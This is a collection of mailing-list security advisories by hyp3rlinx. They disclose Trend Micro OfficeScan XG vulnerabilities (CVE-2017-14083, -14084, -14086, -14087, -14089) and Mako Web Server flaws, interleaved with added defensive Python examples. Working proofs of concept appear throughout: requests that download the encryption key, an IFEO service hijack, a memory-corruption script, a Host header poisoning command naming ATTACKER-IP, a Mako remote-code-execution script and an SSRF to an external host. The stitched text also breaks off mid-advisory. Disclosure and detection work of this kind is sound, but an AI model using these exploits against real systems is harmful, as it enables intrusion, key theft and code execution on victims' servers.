[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan XG
v11.0 and (12.0)*



Vulnerability Type:
===
Unauthorized Start Remote Process Code Execution
Unauthorized Denial Of Service - INI Corruption




CVE Reference:
==
CVE-2017-14086



Security Issue:
===
Remote unauthenticated attackers who can connect to the OfficeScan XG 
application can start the "fcgiOfcDDA.exe" executable on the server. The 
process runs for a short time before it dies, and each invocation leaves a 
crash dump behind, so server disk space can also be consumed by making 
continuous HTTP requests.


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC Start Remote Process Code Execution:

c:\> curl -k  https://VICTIM-IP:4343/officescan/console/CGI/ 

HTTP response:
403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials 
that you supplied

But, we can access it directly :)

c:\> curl -v -k  https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe

HTTP Response:

500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be 
displayed.

The EXE is called then runs for short time before .DMP is generated.

fcgiOfcDDA.exe.6808.dmp

The stored exception information can be accessed via .ecxr.
(568.112c): Unknown exception - code c000000d (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for kernel32.dll - 
eax=00000000 ebx=0014f780 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:



Exploit/POC (Denial Of Service / INI Corruption):
==
[root@localhost /]# curl -v -k  
https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe
* About to connect() to VICTIM-IP port 4343
*   Trying VICTIM-IP.. connected




Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Encryption Key Disclosure CVE-2017-14083 (apparitionsec / hyp3rlinx)

2017-10-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*





Vulnerability Type:
===
Unauthorized Encryption Key Disclosure



CVE Reference:
==
CVE-2017-14083



Security Issue:
===
Remote unauthenticated attackers who can reach the Trend Micro OfficeScan XG 
application, which usually runs on port 4343, can download the OfficeScan XG 
encryption key file "crypt.key". This crypt.key is the key used by the 
OfficeScan XG encryption module, so anyone holding it can decrypt whatever that 
module protects.


References:
===
https://success.trendmicro.com/solution/1118372


e.g.

In "config.php" 

/* *
 * Encryption module configurations
 */
$wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key";   <=== HERE
$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ...
/* *
 * Framework configurations
 */



Exploit/POC:
=

[root@localhost /]# wget --no-check-certificate  
https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
--14:59:52--  
https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
Connecting to VICTIM-IP:4343... connected.
WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP':
  Self-signed certificate encountered.
HTTP request sent, awaiting response... 200 OK
Length: 32 [application/octet-stream]
Saving to: `crypt.key'

100%[==>]
 32  --.-K/s   in 0s 

14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32]
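The crypt.key download above, the cgiGetNTDomain.exe JSON and the analyzeWF.php text from the NT Domain / PHP Information Disclosure advisory earlier on this page are all plain unauthenticated GETs on the same console, so one probe can check a server for all three after patching. The following is an added example (not Trend Micro code) that does that and parses each response into something reportable. The HTTP transport is injected so the parsers can be exercised offline; the sample responses are constructed from the output quoted in the advisories, and the 32 placeholder bytes standing in for crypt.key are not a real key.

```python
"""Probe an OfficeScan console for unauthenticated disclosures (added example)."""
import json
import re
import ssl
import urllib.request
from urllib.parse import urlsplit

ENDPOINTS = {
    "nt_domains": "/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe",
    "php_info": "/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php",
    "crypt_key": "/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key",
}


def http_get(url):
    """Real transport: unauthenticated GET, accepting the console's self-signed cert."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, context=ctx, timeout=10) as resp:
        return resp.status, resp.read()


def parse_nt_domains(body):
    """cgiGetNTDomain.exe returns {"ERROR":{"ERROR_CODE":0},"RESPONSE":{"NODES":[{"NAME":...}]}}."""
    data = json.loads(body)
    if data.get("ERROR", {}).get("ERROR_CODE") != 0:
        return []
    return [node["NAME"] for node in data["RESPONSE"]["NODES"]]


def parse_php_info(body):
    """analyzeWF.php prints '[INFO] Current PHP version: X' and '[INFO] PHP extensions: a, b, ...'."""
    text = body.decode("utf-8", "replace")
    ver = re.search(r"Current PHP version:\s*(\S+)", text)
    ext = re.search(r"PHP extensions:\s*(.+)", text)
    return {"version": ver.group(1) if ver else None,
            "extensions": [e.strip() for e in ext.group(1).split(",")] if ext else []}


def probe(host, port=4343, fetch=http_get):
    """Return {endpoint: {"exposed": bool, ...parsed details}} for one console."""
    base = f"https://{host}:{port}"
    report = {}
    for name, path in ENDPOINTS.items():
        try:
            status, body = fetch(base + path)
        except Exception as exc:          # HTTPError (403/404 once fixed), timeouts, TLS errors
            report[name] = {"exposed": False, "error": str(exc)}
            continue
        entry = {"exposed": status == 200 and len(body) > 0}
        if entry["exposed"]:
            if name == "nt_domains":
                entry["domains"] = parse_nt_domains(body)
            elif name == "php_info":
                entry.update(parse_php_info(body))
            else:
                entry["key_bytes"] = len(body)    # the advisory shows a 32-byte crypt.key
        report[name] = entry
    return report


# Constructed responses, abbreviated from the advisory output; not live data.
SAMPLE_RESPONSES = {
    ENDPOINTS["nt_domains"]: (200, b'{"ERROR":{"ERROR_CODE":0},"RESPONSE":{"NODES":'
                                   b'[{"NAME":"Avaya"},{"NAME":"MyDomain"},{"NAME":"Workgroup"}]}}'),
    ENDPOINTS["php_info"]: (200, b"[INI_UPDATE_SECTION]\n>>>> Start Anaylze WGF : 2017-06-02 15:58:26\n"
                                 b"[INFO] Current PHP version: 7.0.6\n"
                                 b"[INFO] PHP extensions: Core, bcmath, mcrypt, openssl\n"
                                 b"[INFO] WGF version : 3.8\n"),
    ENDPOINTS["crypt_key"]: (200, bytes(32)),     # placeholder bytes, not a real key
}


def fake_fetch(url):
    """Offline transport serving SAMPLE_RESPONSES by path."""
    return SAMPLE_RESPONSES[urlsplit(url).path]


if __name__ == "__main__":
    for name, entry in probe("VICTIM-IP", fetch=fake_fetch).items():
        print(name, entry)
```

On a patched server every entry should come back with "exposed": False (a 403 from the console raises HTTPError in the real transport and is recorded as an error); any "exposed": True is a finding, and an exposed crypt.key should be treated as a key compromise, not just an information leak.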



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor: "hotfix in progress". June 23, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017  : Public Disclosure





Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Change Prevention Image File Execution Bypass (apparitionsec / hyp3rlinx)

2017-10-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.


Vulnerability Type:
===
Image File Execution Bypass



CVE Reference:
==
N/A



Security Issue:

OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM 
service that is supposed to protect OfficeScan processes
like "PccNTMon.exe" from being terminated, and also prevents unauthorized 
arbitrary registry settings being made to the protected
machine even by an Administrator.

However, we can easily bypass this by exploiting Windows Image File Execution 
Options (IFEO) to hijack the service process.
IFEO has been used by malware for some time to prevent a process from running or 
to execute a process of an attacker's choosing in
place of the process the user expects.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options

All an attacker needs to do is create a registry key in IFEO with the same name 
as "TMBMSRV.exe", which is used by the
"Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After 
creating this registry key we create a "string value"
named debugger pointing to, say, "calc.exe"; we wait, and once the system reboots BOOM!


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC:
=

Reproduction:

1) Open registry 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options

2) Create a new Key with no name

3) Create a new string value under the new key named "debugger" with value of 
c:\Windows\system32\calc.exe

4) Rename the created key to TMBMSRV.exe 

5) Reboot system

Done!

We can then not only kill TM but write to the TrendMicro whitelist key in the 
registry for our evil binary to be left alone in peace.



Network Access:
===
Local



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: June 28, 2017
Vendor Reply: "Officescan Build 1222 which is affected by this bug was already 
pulled and is no longer available for public download"
Vendor Reply: "created hotfixes for product improvement."
September 28, 2017 : Public Disclosure




hyp3rlinx
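As an added example (not from the advisory or from Trend Micro), a Python detection routine that parses `reg query /s` output for the IFEO key and reports every image name carrying a Debugger value, rating the advisory's TMBMSRV.exe (or any other protected service binary you pass in) as high. The registry dump below is constructed, not captured from a real host.

```python
import re
from typing import Dict, List, Tuple

IFEO_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
            r"\Image File Execution Options")

# Constructed sample of `reg query "<IFEO key>" /s` output, not captured from
# a real host: a benign subkey without a Debugger value, the TMBMSRV.exe
# entry the advisory describes, and a second entry pointing at a user path.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
    mscorwks.dll    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TMBMSRV.exe
    Debugger    REG_SZ    c:\Windows\system32\calc.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PccNTMon.exe
    debugger    REG_SZ    C:\Users\Public\update.exe
    UseFilter    REG_DWORD    0x0
"""

# `reg query` prints values as "    <name>    <REG_type>    <data>"
VALUE_RE = re.compile(r"^\s{2,}(\S.*?)\s{2,}(REG_\w+)\s{2,}(.*)$")


def parse_reg_query(text: str) -> Dict[str, Dict[str, Tuple[str, str]]]:
    """Parse `reg query /s` output into {key path: {value name: (type, data)}}."""
    keys: Dict[str, Dict[str, Tuple[str, str]]] = {}
    current = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                keys[current][m.group(1)] = (m.group(2), m.group(3).strip())
    return keys


def find_ifeo_debuggers(text: str, protected_images: List[str]) -> List[dict]:
    """Return every IFEO subkey that carries a Debugger value.

    Every Debugger entry deserves review (legitimate ones are rare and
    should be known in advance); one whose image name is in
    `protected_images`, e.g. the endpoint agent's own service binaries,
    is rated high because it redirects that service at its next start.
    """
    wanted = {p.lower() for p in protected_images}
    prefix = IFEO_KEY.lower() + "\\"
    findings = []
    for key, values in parse_reg_query(text).items():
        if not key.lower().startswith(prefix):
            continue
        # registry value names are case-insensitive, so match "debugger" too
        dbg = next((v for n, v in values.items() if n.lower() == "debugger"), None)
        if dbg is None:
            continue
        image = key.rsplit("\\", 1)[1]
        findings.append({
            "image": image,
            "debugger": dbg[1],
            "severity": "high" if image.lower() in wanted else "review",
        })
    return findings


if __name__ == "__main__":
    for hit in find_ifeo_debuggers(SAMPLE_REG_QUERY, ["TMBMSRV.exe"]):
        print("%-7s %-14s -> %s" % (hit["severity"], hit["image"], hit["debugger"]))
```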


Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Memory Corruption CVE-2017-14089 (apparitionsec / hyp3rlinx)

2017-10-02 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt
[+] ISR: ApparitionSec   
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.


Vulnerability Type:
===
Unauthorized Remote Memory Corruption



CVE Reference:
==
CVE-2017-14089



Security Issue:

Remote unauthenticated attackers that can make a connection to the TrendMicro 
OfficeScan XG application targeting the "cgiShowClientAdm.exe"
process can cause memory corruption issues.


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC:
=
import urllib,urllib2
from urllib2 import Request

print 'TrendMicro OfficeScan XG'
print 'Stack Memory Corruption POC'
print 'by hyp3rlinx\n'

IP="VICTIM-IP:4343"

PAYLOAD="A"*256   # defined but never sent in this POC

url = urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe')
cookie="Cookie: serror=0; session_expired=no; FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|; stamp=2231521137; timestamp=1497360567; DisabledIds=.; LogonUser=A; ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; theme=default; wf_CSRF_token=; serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; LANG=en_US; theme=default; lastID=33; lastTab=-1"

print '\nsending packetz... \n'+ cookie

##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411")
#<== X-CSRFToken IS NOT EVEN NEEDED!
url.add_header("Content-Type", "application/x-www-form-urlencoded; charset=utf-8")
url.add_header("Content-Length", "54")
# note the trailing space in the header name and the "Cookie:" prefix inside the value
url.add_header("Cookie ",cookie)

res = urllib2.urlopen(url)   # one request; a second urlopen() on the response object would fail
print res




Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:

Vendor Notification:  June 5, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure




hyp3rlinx


CVE-2017-14087 Trend Micro OfficeScan v11.0 and XG (12.0)* Host Header Injection (apparitionsec / hyp3rlinx)

2017-09-29 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



Vulnerability Type:
===
Host Header Injection



CVE Reference:
==
CVE-2017-14087



Security Issue:

Host header injection issue as "db_controller.php" relies on 
$_SERVER['HTTP_HOST'], which can be spoofed by the client, instead of 
$_SERVER['SERVER_NAME'].
In environments where caching is in place, making an HTTP GET request with a 
poisoned HOST header can make webpages render arbitrary
links that point to a malicious website.


Exploit/POC:
=

c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"



Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
==
Vendor Notification:  June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure




hyp3rlinx
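An added example, not Trend Micro's code: a Python equivalent of the fix the advisory points to, taking the host for absolute URLs from a configured allow-list (or SERVER_NAME) rather than from the client's Host header. The environ dicts and host names are constructed placeholders.

```python
import re
from typing import Iterable

# A syntactically valid Host header: host name or bracketed IPv6, optional port.
HOST_RE = re.compile(r"^(?:[A-Za-z0-9.-]+|\[[0-9A-Fa-f:.]+\])(?::\d{1,5})?$")


def canonical_host(environ: dict, allowed_hosts: Iterable[str]) -> str:
    """Host to use when building absolute URLs for a response.

    The client-controlled Host header is honoured only when it is well
    formed and its host part is in the configured allow-list; anything
    else falls back to SERVER_NAME, which comes from server configuration
    rather than from the request, so a poisoned Host header cannot end up
    in generated links (or in a cache of those links).
    """
    allowed = {h.lower() for h in allowed_hosts}
    raw = environ.get("HTTP_HOST", "").strip()
    if raw and HOST_RE.match(raw):
        if raw.startswith("["):
            host_only = raw.split("]")[0] + "]"      # bracketed IPv6 literal
        else:
            host_only = re.sub(r":\d+$", "", raw)    # drop the port
        if host_only.lower() in allowed:
            return raw                               # keep the port the client used
    return environ.get("SERVER_NAME", "")


def absolute_url(environ: dict, allowed_hosts: Iterable[str], path: str) -> str:
    """Build an absolute URL the way a redirect or link generator should."""
    scheme = "https" if environ.get("HTTPS", "").lower() in ("on", "1") else "http"
    return "%s://%s%s" % (scheme, canonical_host(environ, allowed_hosts), path)


# Constructed request environments (names are placeholders, not real hosts).
ALLOWED = ["officescan.corp.example"]
LEGIT = {"HTTP_HOST": "officescan.corp.example:4343",
         "SERVER_NAME": "officescan.corp.example", "HTTPS": "on"}
POISONED = {"HTTP_HOST": "attacker.example",
            "SERVER_NAME": "officescan.corp.example", "HTTPS": "on"}

if __name__ == "__main__":
    for env in (LEGIT, POISONED):
        print(env["HTTP_HOST"], "->",
              absolute_url(env, ALLOWED, "/officescan/console/html/cgi/db_controller.php"))
```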


CVE-2017-14084 Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution (apparitionsec / hyp3rlinx)

2017-09-29 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



Vulnerability Type:
===
Man-in-the-Middle (MITM) Remote Code Execution



CVE Reference:
==
CVE-2017-14084



Security Issue:
===
A MITM vector exists as the CURL request used by the Send() function in 
"HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set 
to false.
CURLOPT_SSL_VERIFYPEER checks that the remote certificate is valid, that it was 
issued by a CA you trust, and that it's genuine.
CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want 
to talk to...


References:
===
https://success.trendmicro.com/solution/1118372


Vulnerable code snippet...

curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);  // <===  HERE
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);  // <=== THERE



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure




hyp3rlinx
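An added example, not from the advisory or the product: a small Python linter that flags curl_setopt calls disabling TLS verification, run over a copy of the snippet quoted above and over a hardened rewrite of it. The CA bundle path in the hardened copy is an assumption.

```python
import re
from typing import List, Tuple

# Constructed copies: the snippet quoted in the advisory and a hardened
# rewrite. The CA bundle path in the hardened copy is an assumption.
VULNERABLE_PHP = """
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);
"""

HARDENED_PHP = """
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 2);    // 2: cert name must match the host
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, true); // chain must validate to a trusted CA
curl_setopt($this->_objcurlHandle, CURLOPT_CAINFO, '/etc/ssl/certs/ca-certificates.crt');
"""

SETOPT_RE = re.compile(
    r"curl_setopt\s*\(\s*[^,]+,\s*(CURLOPT_SSL_VERIFYPEER|CURLOPT_SSL_VERIFYHOST)\s*,\s*([^)]+?)\s*\)",
    re.IGNORECASE)

FALSE_VALUES = ("0", "false", "null", "''", '""')


def find_insecure_curl_tls(php_source: str) -> List[Tuple[int, str, str]]:
    """(line, option, value) for each curl_setopt that weakens TLS checks.

    VERIFYPEER with a false value skips chain validation entirely.
    VERIFYHOST is only correct as 2: 0 skips the name check, and 1 has
    meant different things across libcurl versions (PHP's own docs warn
    against passing true, which PHP converts to 1).
    """
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in SETOPT_RE.finditer(line):
            option, value = m.group(1).upper(), m.group(2).strip()
            if option == "CURLOPT_SSL_VERIFYPEER" and value.lower() in FALSE_VALUES:
                findings.append((lineno, option, value))
            elif option == "CURLOPT_SSL_VERIFYHOST" and value != "2":
                findings.append((lineno, option, value))
    return findings


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_PHP), ("hardened", HARDENED_PHP)):
        print(label, find_insecure_curl_tls(src) or "no TLS findings")
```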


Mako Web Server v2.5 Multiple Unauthenticated Vulnerabilities (apparitionsec / hyp3rlinx)

2017-09-25 Thread apparitionsec
[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec


Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Mako 
Server's tutorial page.

The vulnerabilities found are:

Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command 
Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery
As these tutorials may be used as the basis for production code, it is important 
for users to be aware of these issues.

“As a compact application and web server, the Mako Server helps developers 
rapidly design secure IoT and web applications. The Mako Server provides
an application server environment from which developers can design and 
implement complete, custom solutions. The Mako Web Server is ideal for embedded 
Linux systems.”

Credit
An independent security researcher, John Page AKA hyp3rlinx, has reported this 
vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.

Vendor response

RealTimeLogic was informed of the vulnerability on Aug 13, but while 
acknowledging the receipt of the vulnerability information, refused to respond 
to the
technical claims, to give a fix timeline or coordinate an advisory, saying:

“I just sent a formal notification for the commercial license requirement and 
also we need to put a maintenance contract in place.
Internally I need to set-up a cost allocation account for billing against these 
support inquiries.”

At this time it’s unclear whether these vulnerabilities are going to be fixed 
and further attempts to get a status clarification failed.


Vulnerabilities details

Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command 
Execution:

The Mako web-server tutorial does not sufficiently sanitize HTTP PUT 
requests; when an attacker sends an HTTP PUT request to the 'save.lsp' web page, 
the input is passed
to a function responsible for accessing the filesystem.

The attacker's input will be saved on the victim's machine and can be executed by 
sending an HTTP GET request to 'manage.lsp'.


HTTP PUT  'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET  'http://VICTIM-IP/examples/manage.lsp?execute=true=2.1=lua'


Proof of Concept


import urllib2,time

#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx
#=

print  'MakoServer v2.5 Remote Command Execution'

CMD="os.execute('c:/Windows/system32/calc.exe')"

opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'
opener.open(request)

time.sleep(1)

urllib2.urlopen('http://IP/examples/manage.lsp?execute=true=2.1=lua')



Unauthenticated File Disclosure

The Mako web-server tutorial is not sufficiently sanitizing GET requests; when an 
attacker sends a GET request to the URI IP/fs/../.., the input is passed
without modification and the response with the file content is returned.

Proof of Concept
The following GET request will respond with the C/Windows/system.ini content:

curl -v http://VICTIM-IP/fs/C/Windows/system.ini

* About to connect() to VICTIM-IP port 80
*   Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 
> OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: VICTIM-IP
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]


Server Side Request Forgery

The Mako web-server tutorial is not sufficiently sanitizing incoming POST requests; 
when an attacker sends a POST request to the 'rtl/appmgr/new-application.lsp'
URI, the input will be executed and the server will connect to the attacker's 
machine.

Proof of Concept
Start Wireshark to see successful connections made from the Mako Web Server victim 
machine.

Initiate requests from another machine using CURL:

curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net -d 
path=http://EXTERNAL-IP



Network Access:
===
Re
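An added example, not Mako's code: a Python check of the kind the tutorial's /fs/ handler lacks, resolving a requested path beneath a fixed root and refusing anything that escapes it, including URL-encoded ".." segments. The root directory is an assumption.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote


def resolve_under_root(root: str, request_path: str) -> Optional[str]:
    """Map the part of a URL after /fs/ to a file path confined to `root`.

    Returns the resolved path, or None when the request would escape the
    root. The request is URL-decoded first (so %2e%2e is seen as ..), then
    joined and normalised, and only then compared against the root: the
    check runs on the path the filesystem would actually open, not on the
    raw string, so ../ sequences and encoding tricks are caught alike.
    """
    root = posixpath.normpath(root)
    decoded = unquote(request_path)
    if "\x00" in decoded or "\\" in decoded:
        return None      # NUL bytes and Windows separators never belong in a URL path
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root.rstrip("/") + "/"):
        return candidate
    return None


# Constructed document root; the tutorial served the whole filesystem instead.
ROOT = "/srv/mako/public"

if __name__ == "__main__":
    for req in ("docs/readme.txt", "../../etc/passwd",
                "%2e%2e/%2e%2e/etc/passwd", "C/Windows/system.ini"):
        print("%-28s -> %s" % (req, resolve_under_root(ROOT, req)))
```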

CVE-2017-11567 Mongoose Web Server v6.5 CSRF Command Execution ( apparitionsec @ gmail / hyp3rlinx )

2017-09-05 Thread apparitionsec
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MONGOOSE-WEB-SERVER-v6.5-CSRF-COMMAND-EXECUTION.txt
[+] ISR: apparitionSec
 


Vendor:
===
www.cesanta.com
